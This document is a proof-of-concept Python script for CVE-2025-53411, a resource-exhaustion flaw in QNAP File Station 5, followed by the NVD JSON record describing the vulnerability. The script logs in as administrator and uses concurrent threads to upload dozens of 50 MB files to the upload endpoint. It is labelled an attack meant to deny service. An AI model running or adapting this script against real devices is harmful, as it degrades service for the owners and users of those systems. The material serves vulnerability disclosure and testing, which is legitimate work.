CVE-2025-53411

# CVE-2025-53411 PoC - Resource Exhaustion Attack # Target: QNAP File Station 5 (versions < 5.5.6.5018) # Requirement: Administrator access to File Station import requests import time import concurrent.futures # Configuration TARGET_IP = "192.168.1.100" USERNAME = "admin" PASSWORD = "admin_password" SESSION = requests.Session() def login(): """Authenticate to QNAP NAS and get session cookie""" login_url = f"http://{TARGET_IP}:8080/cgi-bin/authLogin.cgi" data = { "username": USERNAME, "password": PASSWORD } response = SESSION.post(login_url, data=data, timeout=30) return response.status_code == 200 def create_large_file(size_mb=10): """Generate large file content for upload""" return b'X' * (size_mb * 1024 * 1024) def upload_file(file_num): """Upload large files to exhaust server resources""" try: upload_url = f"http://{TARGET_IP}:8080/cgi-bin/filemanager/cgi_upload.cgi" files = { 'file': (f'large_file_{file_num}.txt', create_large_file(50), 'text/plain') } response = SESSION.post(upload_url, files=files, timeout=60) return f"Upload {file_num}: {response.status_code}" except Exception as e: return f"Upload {file_num} failed: {str(e)}" def resource_exhaustion_attack(num_requests=100, workers=10): """ Execute resource exhaustion attack by uploading multiple large files This PoC demonstrates the lack of resource throttling in File Station 5 """ print("[*] Starting resource exhaustion attack...") print(f"[*] Target: {TARGET_IP}") print(f"[*] Concurrent uploads: {workers}") print(f"[*] Total requests: {num_requests}") if not login(): print("[-] Authentication failed") return print("[+] Authentication successful") with concurrent.futures.ThreadPoolExecutor(max_workers=workers) as executor: futures = [executor.submit(upload_file, i) for i in range(num_requests)] for future in concurrent.futures.as_completed(futures): print(future.result()) print("[*] Attack completed") if __name__ == "__main__": resource_exhaustion_attack(num_requests=50, workers=5)

{"cve": {"id": "CVE-2025-53411", "sourceIdentifier": "[email protected]", "published": "2025-11-07T16:15:39.563", "lastModified": "2025-11-14T20:11:06.563", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An allocation of resources without limits or throttling vulnerability has been reported to affect File Station 5. If a remote attacker gains an administrator account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5018 and later"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.2, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qnap:file_station:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5.6.4691", "versionEndExcluding": "5.5.6.5018", "matchCriteriaId": "A8CD1AA7-AC4B-4100-9789-50556BA83F52"}]}]}], "references": [{"url": "https://www.qnap.com/en/security-advisory/qsa-25-38", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}